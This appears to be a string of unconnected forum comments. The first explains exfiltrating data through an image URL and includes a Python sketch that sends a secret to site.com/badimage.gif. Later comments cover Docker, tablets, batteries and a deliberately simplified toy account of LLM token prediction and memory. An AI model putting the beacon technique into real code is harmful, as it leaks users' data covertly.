Haven't read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
Note: That's also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
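A minimal sketch of that pattern, assuming a Python client just for simplicity (site.com/badimage.gif and the "abcd" value are the placeholders from the comment above): the "image" request smuggles data out in the query string, and the receiving server only has to log it.

    # Sketch: smuggling data out through an "image" request.
    # The server behind site.com never needs to return a real image;
    # it only needs to log the query string of the incoming request.
    from urllib.parse import urlencode
    from urllib.request import urlopen

    secret = "abcd"  # whatever the injected code managed to read
    url = "https://site.com/badimage.gif?" + urlencode({"data": secret})

    # In a browser this would be something like `new Image().src = url`;
    # here we just issue the request and ignore the result.
    try:
        urlopen(url, timeout=5)
    except Exception:
        pass  # the response doesn't matter, the server-side log entry does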
Hah, I was quite proud of that one. Thanks!
Go back to site directories.
Curate your news feed.
Stop using a single corporate search engine.
Participate in online social communities, not in social media.
Since when is "atleast" a word?
Really? Have you set up services with docker before? I found it super easy compared to other systems. Curious what specifically threw you as I barely did anything except spin it up.
Because I like...
If they patent it and don't use it or sell it, I'm OK with it.
Agreed. I have a Tab 9 next to the bed that would be great to not need. That being said, I also use it for sketching plans and as a full PC for VScode-server, and I'm pretty sure a folding phone won't have that modularity with an attached keyboard. Bluetooth keyboard with stand may solve that, though.
I like removable batteries, but I like waterproofness combined with thin more.
Easily serviceable batteries are a great compromise IMO.
This is the catch with OP's entire statement about transformation. Their premise is flawed, because the next most likely token is usually the same word the author of a work chose.
Sort of, but not really.
In basic terms, if an LLM's training data has:
Bob is 21 years old.
Bob is 32 years old.
Then when it tries to predict the next word after "Bob is", it could pick either 21 or 32, assuming the weights are perfectly equal between the two (a weight being based on how many times each value occurred in the training data around other words).
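A toy sketch of that idea (purely illustrative, not how a real model is implemented): count how often each continuation followed "Bob is" in the training data and sample in proportion to those counts.

    import random

    # Toy continuation counts for the context "Bob is ...".
    # A real LLM learns dense weights over its whole vocabulary;
    # these counts just stand in for that.
    continuations = {"21": 1, "32": 1}

    tokens = list(continuations)
    weights = [continuations[t] for t in tokens]
    print(random.choices(tokens, weights=weights, k=1)[0])  # "21" or "32", equally likely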
If the user has memories turned on, it's sort of like providing additional training data. So if in previous prompts you said:
I am Bob.
I am 43 years old.
The system will parse that and use it with a higher weight, sort of like custom-training the model. This is not exactly how it works (training is much more in-depth, and memories are more of a layer on top of the training), but hopefully it gives you an idea.
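Continuing the toy sketch (again just illustrative; the boost value is made up, and real systems mostly inject memories into the prompt/context rather than literally re-weighting anything):

    import random

    # Training-data counts plus a higher-weight "memory" entry.
    training_counts = {"21": 1, "32": 1}
    memory = {"43": 10}  # from "I am Bob. I am 43 years old."

    combined = dict(training_counts)
    for token, boost in memory.items():
        combined[token] = combined.get(token, 0) + boost

    tokens = list(combined)
    weights = [combined[t] for t in tokens]
    print(random.choices(tokens, weights=weights, k=1)[0])  # "43" most of the time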
The catch is it's still not reliable, as the other words in your prompt may still lead the LLM to predict a word from its original training data (there's a sketch of this below the examples). Tuning the weights is not a one-size-fits-all endeavor. What works for:
How old am I?
May not work for:
What age is Bob?
For instance.
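To make that caveat concrete with the same toy sketch (the per-context counts here are invented for illustration only): the model conditions on the whole prompt, so a phrasing the memory layer doesn't latch onto can fall back to the original training statistics.

    import random

    # Made-up per-context counts: one phrasing picks up the memory, one doesn't.
    counts_by_context = {
        "How old am I?": {"43": 10, "21": 1, "32": 1},
        "What age is Bob?": {"21": 1, "32": 1},
    }

    for prompt, counts in counts_by_context.items():
        tokens = list(counts)
        weights = [counts[t] for t in tokens]
        answer = random.choices(tokens, weights=weights, k=1)[0]
        print(prompt, "->", answer)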